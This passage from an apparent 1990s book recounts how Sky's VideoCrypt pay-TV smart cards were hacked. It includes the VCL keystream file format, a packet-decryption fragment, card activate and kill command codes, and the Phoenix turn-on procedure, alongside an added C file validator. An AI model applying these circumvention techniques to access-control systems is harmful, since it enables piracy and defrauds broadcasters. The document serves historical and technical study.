would definitely have been knocked out as it only held the hash function and 
key tables. The real answer to the question is that the ZKT implementation 
in the early models of the VideoCrypt decoders was flawed. As a result the 
ZKT would be ignored which is exactly the result that Sky and News 
Datacom did not want. 


The 07 Ho Lee Fook lasted from April 1993 to 18th May 1994. News 
Datacom tried to implement every electronic countermeasure that they 
could. The hackers defeated every one of them, typically within a few 
minutes. In the end News Datacom were left with little alternative other than 
a new smart card. When they introduced this new smart card it was hacked 
roughly a month after its introduction. This was the famous Dorchester 
Code. News Datacom knocked out this hack a week after it hit the 
market. It was not until November 1994 that working pirate 09 cards 
became widely available. 


VideoCrypt seems to be locked into a hack - intact - hack pattern. This 
pattern has been seen in hacks on other scrambling systems. The 
VideoCipher II system is one that immediately springs to mind. 


The VideoCipher II system was billed as the most secure system yet 
devised. Within a few months, hackers had discovered that the decoder 
could be fooled into allowing access to all channels having only paid for one. 
This was the EPROM hack or, as it was known, the Musketeer hack. The 
parallel with Sky would be the Zener diode or Infinite Lives hack. 
VideoCipher II is now in its third incarnation. VideoCrypt will go through a 
similar set of incarnations until it is replaced by a Digital Television system. 


When VideoCrypt was launched, there was only a stand alone decoder for 
the system. The decoder was only supposed to have been used in the UK 
or Ireland. Of course this was a naive assumption. These decoders were 
being shipped out to mainland Europe by the truck load. 


The biggest mistake made by BSkyB and perhaps News Datacom was 
letting the decoders be integrated with receivers. This produced the IRD. It 
is a lot simpler to ship an IRD than a decoder. Whereas the decoder would 
be listed as such on Customs and Excise documentation, the IRD would 
only be listed as a receiver. 


Every so often the press would be bombarded by press releases claiming 
that BSkyB in conjunction with the UK Customs had prevented yet another 
truck load of decoders from reaching Europe. It was a particularly dull 
period in BSkyB's history considering that anyone in mainland Europe who 
wanted a VideoCrypt decoder could get one without any real problems. 


This new hack could not have occurred at a worse time for BSkyB. It was 
busy trying to persuade new channels to come on to its low pay tier which 
launched in September 1993. 


The Adult Channel was the most vulnerable in all of this fiasco. The fact that 
they are marketing the smart cards on a yearly basis would imply that 
upgrading the cards would be a heavy financial burden. They are now totally 
hacked as the 96 byte key table is available on many BBSes throughout 
Europe. Only minor ECMs have been seen on this channel. It seems that 
they are not too worried about piracy. But then given that most people would 
rather watch the uncut porn on FilmNet or TV1000, this channel does not 
have such a great audience. 
The issue of new card batches for BSkyB channels occurs mainly in Spring 
or Autumn. A Summer launch of the new 08 cards would have been 
unusual. Indeed the 08 card design had to be junked as it probably was little 
more than a change of code tables. BSkyB were eventually forced to issue 
an 09 card in February 1994. This was at least six months ahead of their 
own schedule. 


The philosophy of VideoCrypt is that of the detachable secure controller. 
Basically what this means is that if the system is hacked then all that needs 
to be done to stop the hack is to issue a new card. 


The effects on the confidence of present and prospective users of 
VideoCrypt are more difficult to gauge. The smart card is the core of the 
VideoCrypt system. Seeing it replaced by a pirate smart card contradicts 
every claim made in favour of VideoCrypt. It was not supposed to be 
possible. One thing is certain, channels will now have to look at a 
scrambling system as only being a temporary form of protection that has to 
be frequently updated. 


The source code for the PIC16C84 hacks on VideoCrypt is widely available 
on the internet and BBSes. While it is now obsolete on the Sky channels, it 
is still being used by the Adult Channel and their hardcore version, Eurotica. 
The WWW and FTP sites referred to in Chapter 5 carry the most current 
versions of this PIC code. 


The 07 OMIGOD Hack 


Well after the Ho Lee Fook, the OmiGod was the logical progression. The 
OmiGod (pronounced Oh My God) was a PC emulator for VideoCrypt. The 
program is public domain software. The name of the hack is SEASON7. 
SEASON was intended to be a reference to the seventh season of Star 
Trek - The Next Generation. Many hackers have referred to the hack as the 
OMIGOD hack. The now commonplace name for this type of hack is a 
SEASON hack. 


This hack allowed the PC or indeed many other computers to emulate an 
official 07 Sky card. The PC was connected to the VideoCrypt decoder's 
card slot by means of an interface. It was the ultimate insult for News 
Datacom - computer hobbyists were able to run the hacks on their home 
computers. There were versions for the BBC Archimedes and the Apple 
Mac computers as well. 


The program was created for use outside of the UK. The reason for its 
creation is Star Trek. Apparently Sky has refused to provide subscriptions 
outside of its own copyright area. The direct result of this has been to irritate 
those who would honestly subscribe, if they were allowed to. 


When the program was released it spread like wildfire. The method of 
release was similar to that of shareware. The Usenet and the bulletin 
boards ensured that it covered Europe in a matter of a few hours. Though 
its use in the UK was of grey area legality, there was no possible way of 
stopping its distribution in the UK. Sky and News Datacom could not close 
down every international telephone line and neither can they close down 
every UK BBS. 


There were some rumours that the program would be released via the 
Delphi system in the USA. This internet system apparently was bought by 
Rupert Murdoch some time ago. If this had happened it would have been an 
elegant hack. 


The interface is a very simple circuit consisting of a MAX232 and a 74LS07. 
The MAX232 converts the levels between RS232 and TTL and the 74LS07 
is an open collector buffer. The MAX232 generates the two positive and 
negative RS232 voltages internally. This means that the card power supply 
line from the decoder can drive the interface directly. 


The interface can be constructed on a printed circuit board or a piece of 
stripboard. The main disadvantage for some people will be the connection 
of the interface to the decoder. The most logical method would be via the 
card socket. The problem is that a dummy smart card would have to be 
etched. 


The standard fibreglass printed circuit board material is 1.6 millimetres 
thick. The thickness of the smart card is roughly half of this. Where PCB 
material of the correct thickness was not available, it was common to sand 
down a 1.6 mm piece of PCB. The etching would be carried out first. The 
resultant PCB would be longer than the official smart card. Some people 
have suggested using the defunct pirate cards instead. 


The direct connection of the interface to the decoder is also possible. The 
only connections to the decoder are the data line, the 5 Volt Vcc line, 
Ground and RESET. This is of course a risky option for those unfamiliar 
with the circuitry. 


This hack had the effect of creating a sub-industry of interface sellers. 
Some of the better interfaces are detailed in Chapter 4. It also laid the 
foundations for the 09 Season programs and the D2-MAC EuroCrypt 
season programs. 
Delayed Data Transfer 


The DDT hack is currently the most reliable hack on the VideoCrypt system. 
Indeed it should work on any implementation of VideoCrypt across the 
planet. 


The letters DDT stand for Delayed Data Transfer or Transmission. However 
the effect on VideoCrypt would be similar to the pesticide of the same 
name. 


The flaw that allows this hack to work is that the data rate of the control 
packets on the VideoCrypt system is approximately 1 kilobaud. This data 
rate is slow enough to allow the signal to be recorded on a standard video 
tape recorder. Of course there are some VCRs that do not record the VBI 
lines that carry the data. 


The principle of the hack is that the key stream from a valid card can be 
recorded and stored. This keystream can then be played back to a decoder 
that is being fed with a scrambled recording of the programme that the 
keystream was made for. The decoder will decode the scrambled signal as 
the keystream is played back, as if it were coming from a valid smart card. 


The keystreams for various programmes have already been posted on 
various BBSes and FTP sites. Mainly these streams have been for "Star 
Trek: Voyager", "The X-Files", "Space: Above And Beyond" and "Deep 
Space 9". Movies are not so much the main target of this hack as the cult 
series. 


Some people have commented that this hack is not really a true hack. I 
would disagree with this. It is a very elegant hack and, most importantly, it 
works. 


Perhaps the effective use of this hack will be in the area of Pay Per View. 
Normally when PPV is considered, the programming is thought of in terms 
of concerts or sporting events. While these do form part of a PPV 
channel, the real attraction is in first run movies. This is exactly the type of 
programming at which the hack excels. 


All of the 09 SEASON programs have the DDT code incorporated so that 
they can be used for this hack. It is then a question of obtaining the VCL 
files from either the ftp.informatik.uni-erlangen.de FTP site or from some of 
the satellite television BBSes around Europe. 


There have been some modified versions of the DDT hack. One of the 
more elegant of these has been the VBL 
Official Specification For The VCL File Format 


The essential data for decoding the scrambled VideoCrypt signal is the 
74h/78h pair. These are the message block and the key packets 
respectively. Much of the rest of the data traffic is card authorisation and 
deauthorisation data. 


The VCL format uses this redundancy to save storage space. Only 12 bytes 
of high entropy (that is, almost incompressible) data are stored every 2.5 
seconds. Therefore a VCL file of a 1 hour programme is only about 17 
kilobytes large. In addition, VCL files do not contain information about the 
card owner (especially the card serial number), which appears in normal full 
log files in the 70h and 7Ch packets. (The only potential security hole is the 
remaining nibble in the 78h key packet. Consequently it should be cleared in 
order to prevent card-specific information from leaking into the VCL file.) 


VCL files have a very simple binary format consisting of a 128 byte header 
and a specified number of 12 byte records. At the end, VCL files may be 
padded with zero bytes to a multiple of the operating system's disk sector 
size, so that no RAM contents can leak into the file out of an insecure 
system like MS-DOS. Don't forget to use a binary mode if you transfer VCL 
files or their contents will be rendered unusable. 


The 128 Byte VCL File Header Format 

Bytes 0 - 3 
ASCII string "VCL1" which identifies the file type and version of the format. 

Bytes 4 - 7 
The number of 12-byte records stored in this file encoded as a big-endian 
(most significant byte first) 32-bit unsigned integer value. 

Bytes 8 - 23 
Date and time when the recording started. Format: yyyymmddThhmmssZ, 
where yyyymmdd are year, month and day (e.g. "19940618"), hhmmss are 
hour, minute and second (e.g. "235959"), T is just the ASCII letter T, and Z 
is the ASCII letter Z if the time is UTC or a zero byte if the time is local time. 
The digits are ASCII characters. 

Bytes 24 - 55 
Name of the satellite or cable system from which the recording was done. 
This is a zero terminated ASCII string with only characters between 20h and 
7Eh. As many zero bytes are appended as necessary for filling up the 32 
bytes. The same format is also used for the next two text fields. Example: 
"Astra". 

Bytes 56 - 63 
Name/number of the transponder from which the recording was done. 
Example: "08" for Sky One on Astra. 

Bytes 64 - 127 
Description of what has been recorded. Example: "Star Trek: TNG, episode 
123". 


The first 128 bytes are followed by as many 12 byte records as are 
specified in bytes 4-7. Each record represents a 74h/78h VideoCrypt 
protocol pair and consists of two fields: the first 4 bytes are the final 4 bytes 
of the 74h message packet part, the remaining 8 bytes are the data part of 
the corresponding 78h key packet. Four bytes of each 74h packet are 
enough to allow a card emulator to quickly and reliably synchronize with the 
queries of the decoder. The final four bytes of the 74h commands have 
been selected because of their high entropy (signature and checksum). 
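

The VCL layout just described, as an added example that is not part of the 
original book or of any SEASON program: a C validator that parses the 128 
byte header, pulls one 12 byte record apart and confirms that any sector 
padding is all zero, the leaked-RAM check the format is designed to allow. 
The in-memory sample image and all function names are constructed for 
this example. 

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#define VCL_HEADER_LEN 128
#define VCL_RECORD_LEN 12

/* Parsed view of the 128 byte VCL header. */
typedef struct {
    uint32_t record_count;   /* bytes 4-7, big-endian */
    char timestamp[16];      /* bytes 8-22 as text: yyyymmddThhmmss */
    int is_utc;              /* byte 23: 'Z' means UTC, 0 means local time */
    char system[33];         /* bytes 24-55 */
    char transponder[9];     /* bytes 56-63 */
    char description[65];    /* bytes 64-127 */
} vcl_header;

/* Copy a fixed-width text field: only 20h-7Eh before the zero terminator, only zero padding after. */
static int copy_field(char *dst, const uint8_t *src, size_t width)
{
    size_t i = 0;
    for (; i < width && src[i] != 0; i++) {
        if (src[i] < 0x20 || src[i] > 0x7E) return -1;
        dst[i] = (char)src[i];
    }
    dst[i] = '\0';
    for (; i < width; i++)
        if (src[i] != 0) return -1;
    return 0;
}

/* Validate a VCL image held in memory: 0 on success, a negative code naming the bad field. */
int vcl_parse_header(const uint8_t *buf, size_t len, vcl_header *h)
{
    if (len < VCL_HEADER_LEN) return -1;
    if (memcmp(buf, "VCL1", 4) != 0) return -2;
    h->record_count = ((uint32_t)buf[4] << 24) | ((uint32_t)buf[5] << 16)
                    | ((uint32_t)buf[6] << 8) | buf[7];
    for (int i = 0; i < 15; i++) {   /* yyyymmddThhmmss: digits, with 'T' at offset 8 */
        uint8_t c = buf[8 + i];
        if (i == 8 ? c != 'T' : (c < '0' || c > '9')) return -3;
        h->timestamp[i] = (char)c;
    }
    h->timestamp[15] = '\0';
    if (buf[23] != 'Z' && buf[23] != 0) return -3;
    h->is_utc = (buf[23] == 'Z');
    if (copy_field(h->system, buf + 24, 32) != 0) return -4;
    if (copy_field(h->transponder, buf + 56, 8) != 0) return -5;
    if (copy_field(h->description, buf + 64, 64) != 0) return -6;
    /* every record announced in bytes 4-7 must actually be present */
    if ((uint64_t)h->record_count * VCL_RECORD_LEN > len - VCL_HEADER_LEN) return -7;
    return 0;
}

/* Split record n into its 4 byte 74h tail and 8 byte 78h data part. */
int vcl_get_record(const uint8_t *buf, size_t len, uint32_t n, uint8_t tail74[4], uint8_t key78[8])
{
    size_t off = VCL_HEADER_LEN + (size_t)n * VCL_RECORD_LEN;
    if (off + VCL_RECORD_LEN > len) return -1;
    memcpy(tail74, buf + off, 4);
    memcpy(key78, buf + off + 4, 8);
    return 0;
}

/* Sector padding after the last record must be all zero; anything else leaked in from memory. */
int vcl_padding_is_clean(const uint8_t *buf, size_t len, uint32_t records)
{
    for (size_t i = VCL_HEADER_LEN + (size_t)records * VCL_RECORD_LEN; i < len; i++)
        if (buf[i] != 0) return 0;
    return 1;
}

/* Constructed sample image (not a real recording): two records plus four bytes of padding. */
static uint8_t sample[VCL_HEADER_LEN + 2 * VCL_RECORD_LEN + 4];
size_t vcl_build_sample(void)
{
    static const uint8_t rec[2][VCL_RECORD_LEN] = {
        {0x11, 0x22, 0x33, 0x44, 0xA0, 0xA1, 0xA2, 0xA3, 0xA4, 0xA5, 0xA6, 0xA7},
        {0x55, 0x66, 0x77, 0x88, 0xB0, 0xB1, 0xB2, 0xB3, 0xB4, 0xB5, 0xB6, 0xB7}
    };
    memset(sample, 0, sizeof sample);
    memcpy(sample, "VCL1", 4);
    sample[7] = 2;                                /* record count = 2 */
    memcpy(sample + 8, "19940618T235959Z", 16);   /* start time, UTC */
    strcpy((char *)sample + 24, "Astra");         /* text fields use the spec's own examples */
    strcpy((char *)sample + 56, "08");
    strcpy((char *)sample + 64, "Star Trek: TNG, episode 123");
    memcpy(sample + VCL_HEADER_LEN, rec, sizeof rec);
    return sizeof sample;
}

int main(void)
{
    vcl_header h;
    size_t len = vcl_build_sample();
    if (vcl_parse_header(sample, len, &h) != 0) return 1;
    printf("%s: %u records, padding %s\n", h.description, h.record_count,
           vcl_padding_is_clean(sample, len, h.record_count) ? "clean" : "dirty");
    return 0;
}
```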


DDT - The 09 Version 


The Video Broadcast Log, VBL, is an enhancement of the DDT log format. It 
differs from the DDT in that it allows for a more reliable method of providing 
the VCL file. The VCL file as per the original specification was effectively a 
publication of the correct key responses for the 74h packets. 


With VBL, the initial file is a record of traffic between an INVALID card and 
the decoder for the required television programme. The user, person A will 
record this file on his PC and of course the encrypted television programme 
on video. 


This data log made with the invalid card is then passed to someone with a 
VALID card, person B, who will then make a VCL file with the correct 
responses in place of the bad ones from the VBL data log. The corrected 
file can then be returned to person A. 


The security of this scheme lies in the trust between the two parties. Should 
the legal framework about posting VCL files in public change, then this is an 
excellent alternative. 


At the moment the only use of the DDT and VBL hack is for people outside 
the copyright area. Sky will not sell these people a legitimate subscription 
and these people only want to watch the cult series on Sky One such as 
"Star Trek: DS9", "The X Files" etc. Movies as such do not seem to be a 
target of this hack. 


The usage of this hack also seems to be of a particularly low level. This can 
be attributed to two factors: better programmes on other channels and the 
complexity of the hack. 


The hack requires the VCR to be connected initially to the satellite receiver 
and then to the decoder. The playback quality of some VCRs is not good 
enough to allow proper decoding. However on many it works well enough. 
The video quality of the decoded picture is not exactly broadcast quality. Of 
course if you are dedicated to watching the "X Files" or "Star Trek: DS9" 
such things do not matter much. 


The 07 to 09 Transition 


The security of Sky's 07 card was a joke. Everyone had the code and there 
was very little that Sky could do about it. Indeed some hacker estimates put 
the number of pirate 07 devices at about 500,000 in the UK. This was ten 
times that estimated by Sky later in a court case in 1994. It was just not 
economically feasible for Sky to prosecute all the people that they 
suspected of hacking their service in the UK. They also admitted that in the 
same affidavit. 


Perhaps Sky could have tried to implement some of the ECMs that the 07 
Sky card was capable of. However things pointed to the fact that the 
complete code from the 07 card had been popped, even though most 
hackers knew that what Sky was using was effectively the bare minimum 
with some key table changes. They could have made the code and 
algorithm a lot more processor dependent. 


The satellite press was beginning to question the expertise and strategy of 
Sky. Most of the magazines were flooded with advertisements for pirate 
cards. Even the UK magazines were carrying advertisements for the pirate 
Sky cards. Sky were doing a corporate impression of an ostrich, ignoring 
questions. 


The reality of the situation was beginning to tell on Sky. They could no 
longer evade the problem and they switched to their new smart cards - 
issue 09. They had been sending these cards out since February but on 
May 18th 1994, the pirate cards ceased to operate. The SEASON07 
program stopped working. Sky had, or so they thought, won the war. The 
fun had only just begun. The day became known as Dark Wednesday - the 
day the Skys went black. 


In the aftermath, the pirates and hackers were reeling. Some of the more 
vociferous ones had disappeared almost overnight. The sounds of angry 
customers may have had a lot to do with it. Some of the more optimistic 
dealers were promising that they would have the new codes really soon, 
perhaps in a few weeks. 


The pirate market had collapsed only a month or so earlier. The pirate 07 
cards were being sold for less than forty pounds. The SEASON07 program 
had spread all over Europe and was available for most computers. 


Sky were overjoyed. They had scored a major victory. It was the only time 
that they had effectively nuked the whole industry. Roughly a month later, 
Sky had little reason to be joyful. 


The Dorchester Code 


On June 20th 1994 there was an auction at the Dorchester Hotel in London. 
On auction was the 09 Sky code. The asking price was over £300,000. 
Apparently some of the code was sold because within a matter of hours, the 
pirate cards were going back into operation throughout Europe. In the UK, it 
was an utter disaster for Sky as people were lining up to have their old 07 
pirate smart cards turned into pirate 09 smart cards. Some reports had 
pirates sitting in pubs with laptops and lines of eager punters, their pint in 
one hand and their card in the other queuing for the upgrade. 


The new code fragment was small enough to fit into the memory of a 
PIC16C84. It was a considerable change from the 07 algorithm but it was not 
so different that it could not be emulated on the PIC. The fact that this 
algorithm used multiplication was a sign of things to come. 


The algorithm as used in the Dorchester Code and subsequently in the 
main implementation of the 09 algorithm is examined in detail in Chapter 6. 
However there are many unanswered questions about the origin of this 
code. Some sources considered that the point of origin was within News 
Datacom itself. 


Given that News Datacom have filed a suit against eleven defendants, 
some of whom worked for News Datacom, alleging that they conspired to 
overcharge for smart cards, it is plain to see where this idea came from. If 
these people allegedly would screw what was in effect their employer, would 
they sell out the code to the pirates as well? The answer seems to be no. 
The individuals named in the suit do not seem to be pirates, just business 
people. 


The documented code fragment that was given to illustrate the provenance 
of the Dorchester Code seemed to tend more towards a genuine hack of 
the official card rather than a lifting of some internal News Datacom 
documentation. 


The Dorchester code only lasted about a week. Sky were only using a 
transitional version of the 09 algorithm. This meant that the simple 
implementation of the 09 algorithm in the PIC16C84 would work. Then Sky 
ECMed the Dorchester code. The pirate market was in tatters. Some of the 
pirate dealers in the UK had to go into hiding. Others went off on a search 
for the new codes. It was as futile as a quest for the Holy Grail and these 
pirates did not exactly meet the standards of purity required. The fiasco that 
ensued must have cheered Sky up. After a year of abject piracy they were 
getting their own back on the pirates. The pirates were almost self- 
destructing in the effort to get the new code. Some hackers were close to 
nervous breakdowns trying to crack the new code by cryptographic means. 


Two pirates flew down to Spain to see the self-appointed number one 
hacker, the same one who had rather incompetently plagiarised version 3 of 
the Black Book. (His self-appointment came as a surprise to the many 
excellent Spanish hackers.) It turned out that this guy hadn't a clue about 
cryptography or indeed how to solve the upgrade. 


Needless to say the pirates were less than impressed. The pirates flew back 
and continued their search for the Holy Grail. What followed was a long 
summer of false starts and disgruntled customers. It seemed that Sky was 
winning. 


However the fact that it was easy to obtain a genuine 09 Sky card with false 
details from most television shops in the UK meant that anyone who really 
wanted to watch Sky could do so. It would of course be switched off after 
about two weeks but it was very easy to get a new card. Besides, they could 
always get a D2-MAC card and decoder. 


The Dorchester code made its way to the TV-CRYPT group where it was 
analyzed. The algorithm was an improvement on the 07 algorithm. But there 
was something else. By rewriting the code it was possible to generate a 
correct signature for any packet of data. Now since Sky's VideoCrypt 
system operated on an over the air authorisation procedure perhaps it 
would be possible to switch on cards without the intervention of Sky. 


After some analysis of the logs of over the air data, patterns became clear. 
The card identity number is returned when a card is inserted into a decoder. 
By phoning Sky and having them turn on some cards over the air, it was 
possible to build up an image of how the authorisation scheme worked. By 
the first week in August, the Phoenix program had been created by Markus 
Kuhn and posted to TV-CRYPT. The program was based on the DECOEM.C 
program which allowed the PC to emulate a VideoCrypt decoder and send 
packets to a card via an interface. 

Of course the Phoenix program was an intellectual exercise to see how the 
VideoCrypt system worked. There were a few who saw it differently. They 
sold the program in some cases for thousands of pounds. Sky were about 
to get the shock of their lives. 


The 74h Packet 


The 07 and 09 packets were in a 27-4-1 structure. The first 27 bytes are the 
data bytes, the 4 bytes are the hash signature/checksum and the final 1 byte 
is a Modulo 256 packet checksum. 

In the 09 implementation, the card serial numbers were encrypted with a 
small encryption routine. This extra level of security was to little avail as the 
algorithm was cracked. The algorithm generated a four byte table. Byte 0 of 
this table was EXORed with byte 3 of the 74h packet to get the command. 
Byte 2 of the table is EXORed with Nanocommands 

It is believed that the VideoCrypt-II system uses a largely similar algorithm 
though the positions of the input bytes are different. Though the capability of 
a VideoCrypt-II Phoenix program exists, there is no incentive for the 
commercial pirates to market such a program as it would involve releasing 
the VideoCrypt-II code table. 


The relevant nanocommand decryption algorithm fragment (74msg is the 74h 
packet as a byte array; it is written msg74 here because a C identifier 
cannot start with a digit): 

    unsigned char xx, b, com_arr[4]; 
    int i; 

    xx = msg74[1] ^ msg74[2]; 
    xx = (xx >> 4) | (xx << 4);        /* swap the two nibbles */ 
    b = msg74[2]; 
    for (i = 0; i < 4; i++) 
    { 
        b = (b << 1) | (b >> 7);       /* rotate left by one bit */ 
        com_arr[i] = xx + b;           /* 8-bit addition, wraps modulo 256 */ 
        b = com_arr[i]; 
    } 


7-49 


7: Video Manipulative Systems 


VideoCrypt 1 - 74h Packet Structure 


[Figure: byte layout diagram of the 74h packet. Byte positions 02 to 30 are 
marked against these fields: Decoder Flags Byte; Card Age Byte (Month 
Code); Packet Command Byte; Channel Identifier Byte; 4 Most Significant 
Bytes Of Card IDs; Hash Function Checksum/signature; Modulo Packet 
Checksum.] 


The fifth bytes of the card IDs addressed in this packet 
follow the four byte root. 


The packet command would identify the packet as a 
turn-on packet, a kill packet or a Nanocommand packet. 


The Packet Command byte value for a Nanocommand 
packet was 80h. This was a change from the original 
specification. In the original specification, the Kill command 
was 00h, a batch kill command was 80h and a turn on 
command was 20h. The 09 card integrated the channel ID 
with the turn-on/kill instructions. This had the effect of 
increasing the bandwidth as packets did not have to be 
transmitted on the relevant channels. 


In VideoCrypt-2, Byte 02 is a day code. To derive the 
correct day, the value is ANDed with 1Fh. Byte 03 is the 
tier byte and is also ANDed with 1Fh. Byte 04 is the 
channel ID. Byte 09 is the Packet Command byte. The 
same type of card addressing seems to be in use. 
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Phoenix In Operation 


The central packet of the VideoCrypt system is the 74h packet. This is the 
system's workhorse and it handles the seed data transmission and the card 
addressing tasks. The manner in which it combines both tasks is elegant. 
The complete 74h packet is used by the hash algorithm to generate the key. 


The last five bytes of this packet are the checksums. The last byte is a 
modulo checksum and is a value that is added to the sum of the bytes to 
ensure that the result of the addition is an even multiple of 256. The other 
four bytes are the hash function signature or checksum. If any of these 
bytes are incorrect then the packet will be rejected by the card. The modulo 
checksum is trivial but the hash function checksum requires a valid hash 
algorithm and a valid set of keys. This is not so trivial. 


The weakness of the 09 card was that it only required one valid keytable to 
generate a properly checksummed packet. It did not even have to be the 
keytable in use at the time. The 09 card had a set of keytables that could be 
selected in a similar fashion to the 07. 


The Phoenix Program created a valid 74h packet including the serial 
number of the card to be turned on with the turn on command to activate all 
channels on the card. The model of the Phoenix in operation is simple. 


1. Read The Card Serial Number 
2. Create A Turn-On Packet With That Card's Serial Number 
3. Send The Turn-On Packet To The Card. 
4. Verify The Card Has Been Turned On. 


Of course the above steps are drastic simplifications. The framework for 
this operation was a program called DECOEM.C. This program was written 
by Markus Kuhn to emulate a VideoCrypt decoder. The next step in this 
process was to integrate the routines to read the card serial number and 
encode it within a valid turn-on packet. 


The turn-on packet is merely a packet with the card command byte having a 
value that will turn on a card for a certain channel or group of channels. 
Correspondingly, in a kill or turn-off packet, the command byte has a value 
that will turn off a particular channel or group of channels. 


A fundamental requirement in all of this is to have a valid algorithm and set 
of keys. The basic algorithm and keys were all that was required for this 
operation and the code auctioned at the Dorchester Hotel was used for this. 
Of course it was a serious mistake by News Datacom to allow the basic 
algorithm to be reused. In retrospect it would have been more logical to 
make sure that once a higher level of the algorithm had been used, the card 
would not respond to simpler implementations. Of course this is easy to say 
now and the 09 smart card code was far more elegant than the previous 
versions. 


The commands that allowed the activation and deactivation of the channels 
are as follows: 

00  Deactivate Whole Card ("Please Call 05%") 
01  Deactivate Sky Movies 
02  Deactivate Movie Channel 
03  Deactivate Sky Movies Gold 
06  Deactivate Sky Sport 
08  Deactivate TV Asia 
0C  Deactivate Multichannels 
20  Activate Whole Card (Remove "Please Call 05%") 
21  Activate Sky Movies 
22  Activate Movie Channels 
23  Activate Sky Movies Gold 
26  Activate Sky Sport 
28  Activate TV Asia 
2C  Activate Multichannels 
40  PPV Account Management 
44  PPV Authorisation 

The last two commands were to do with the PPV events on the Sky 09 card. 
The 44 command was used to activate cards for the Sky Sport special PPV 
event for pubs only. This was Sky's only attempt at PPV during the lifetime 
of the 09 card and it failed due to being overpriced and hacked. 

The Working Pirate 09 Cards 


It is estimated that over the period between August and November 1994, 
BSkyB lost over 750,000 of their official cards to Genesis activator-blocker 
piracy. They did of course implement ECMs to knock out these missing 
cards. The pirates responded with blocker circuits that looked for the kill 
codes and stopped them. It was definitely a case of history repeating. 
However by October, there was a working pirate 09 smart card. It was the 
end of the security on the 09 card issue. 


Various implementations of the pirate 09 card were surfacing throughout 
October but they generally only worked for a few weeks. The ECMs were 
regularly knocking out these cards. However the information gleaned from 
these ECMs by the pirates was invaluable. The result was a more resilient 
pirate 09 Sky card. 


As with any new hack, the devices went through what could be described as 
a teething process. The first versions of the pirate 09 cards had two 
PIC16C84s and one 24C65. It was a case of expecting an ECM every two 
or four weeks. When the ECMs occurred, the cards had to be reprogrammed 
but as each ECM was implemented, the knowledge base of the hackers and 
pirates expanded. 


News Datacom had been clever. In fact they had been too clever and as a 
result had left their system open to being compromised. They had made the 
whole address space of the 09 card usable as input data for the hash 
function. This meant that any pirate card had therefore to have a working 
image of the Sky card in memory. In a court case, it would have been very 
easy to prove that the pirate card was a copy. It was a move that could have 
been suggested by a lawyer. 


There were other aspects to this move that were very innovative. The 
nanocommands (covered later in this chapter) gave new life to a subscriber 
management system groaning under the weight of new subscribers. It also 
allowed the cards to be reprogrammed over the air and it was possible to 
incorporate new channels and PPV events. It truly was a work of art. 
However it was flawed. 


Much to the joy of the pirates, the 09 card eventually turned out to be much 
easier to emulate than at first thought. Most of the strongest aspects of the 
09 were left relatively unused by News Datacom. It was a question of 
keeping the system up and running. Therefore as each ECM would 
theoretically knock out a small percentage of legitimate cards, using very 
complex ECMs would probably knock out a larger amount. Considering the 
effect that the Genesis/Phoenix hack was having on the Quickstart smart 
card reserves, the prospect of too many ECMs was probably weighing heavily 
on the minds of those in Sky and News Datacom. Sky were later forced to 
stop the Quickstart scheme due to massive abuse and loss of cards. The 
Quickstart scheme was stopped in early 1995. It was the case that if they 
had not done this, they would have had to introduce the 10 card at least six 
months before they did. 


The 09 Sky card used a Motorola MC68HC05SC21 microcontroller. This 
was based on the MC68HC05C4 microcontroller. There are many theories 
as to how the card was popped but the fact remains that it was. Some of 
these theories relate to the fact that the pirates had developed methods 
of activating the test mode of the card and dumping out the contents. Others 
related to the nanocommands. In either case, the card was dumped. 


The problem with dumping the code from a card is not so much 
implementing it in an emulation. It is actually understanding the function 
of each routine. In this particular application, it is a Catch 22 situation. It is 
very difficult to actually understand the function of the routine until you see 
the effect. And by then it is too late because your emulation has been 
knocked out. 


The Rise Of The Battery Card 


The problem of updating the PIC16C84 cards was beginning to affect 
business for the pirates. At best customers could only expect about two to 
four weeks of ECM free operation before having to return the card to the 
dealers. Of course this was a good thing for the dealers as they could 
charge about £5 for the upgrade fee. 


The solution to the problem was the battery card. This was a development 
of some ideas that had been in existence for over ten years. Indeed the 
American influence was clear. The idea of using a keypad for updating 
codes and keys had been widely used for the VideoCipher II piracy. 


The European situation was somewhat different to the VideoCipher one. 
With VideoCipher II, the only traffic was an update of the monthly keys. With 
VideoCrypt, it was more complex. Areas of the card image had to be 
modified or indeed the operation of the emulator code had to be modified. It 
was also the first time that this type of update procedure was to be used on 
a smart card. The resulting device was far more advanced than any of the 
official cards. 


The core of the new pirate card, now known as a Battery card, was the 
Dallas 5002FP. This is a secure microcontroller that has, to date, resisted all 
of the simple attempts to extract the code. It is based on the 8051 
microcontroller, a choice that was to prove to be fortunate considering the 
core of the official Sky 10 card. 


The card had a Lithium battery as a backup for the card’s memory. At first, 
the card was referred to as the Pacemaker but the term “Battery Card” 
quickly took over. From that point on, every Dallas based card has been 
referred to as a Battery card. 


The Dallas 5002FP offered the pirates excellent security even though it was 
more expensive than the PIC16C84. However at that point, the PIC16C84 
was totally compromised. It was the beginning of the migration of the 
commercial pirates to more secure microcontrollers. 


The Battery card was significant in a more fundamental way. It took the 
onus of the upgrade away from the pirate card dealers and placed it firmly 
on the shoulders of the card user. It was the card user who would have to 
enter in the new upgrade codes each time there was an ECM. 


Entering the new codes into the battery cards was as simple as 1 2 3 or in 
another case, as simple as A B C. It was the perfect interface as anyone 
could use it. The update codes were made available via telephone 
answering machines, fax machines, BBSes and the internet. 


The lifetime of any ECM was now only a question of minutes. With the 
whole procedure of sending an ECMed card back to the dealer taken out of 
the equation, the viability of any ECM on VideoCrypt was questionable. Of 
course News Datacom did score some notable successes against battery 
cards. One of these involved an ECM that managed to overwrite a section 
of a battery card's memory. This ECM meant that users had to return their 
cards for reprogramming. But successes like this were few and were 
swamped by disaster. 


The success of the battery card in Europe meant that it was the starting 
ground for the pirate DSS cards in North America. This was due mainly to 
the robust security of the Dallas 5002FP more than anything else. However 
with the huge demand for the Dallas 5002FP, the pirate DSS cards have 
also used the predecessors of the 5002FP. The official line on this was that 
News Datacom and DirecTv have been watching the suppliers of these 
chips. The more realistic explanation is that the chip is too popular here in 
Europe. 
NanoCommands 


The 09 Sky card was a lot more sophisticated than the 07 card. Apart from 
the improved architecture, the code was more elegant. The hash function 
was definitely more complex than the 07 as it modified all of the bytes of the 
eight byte answer in each iteration. The 07 only modified two bytes on each 
iteration. 


The enhancements did not end there. The card also contained the routines 
to allow Sky to reprogram the card over the air. This was later used to great 
effect by hackers and pirates who reprogrammed the 09 cards as D2-MAC 
and VideoCrypt-II cards. 


The method of doing so was to include a special 74 packet in the over the 
air data. This packet was slightly different from the average 74h packet in 
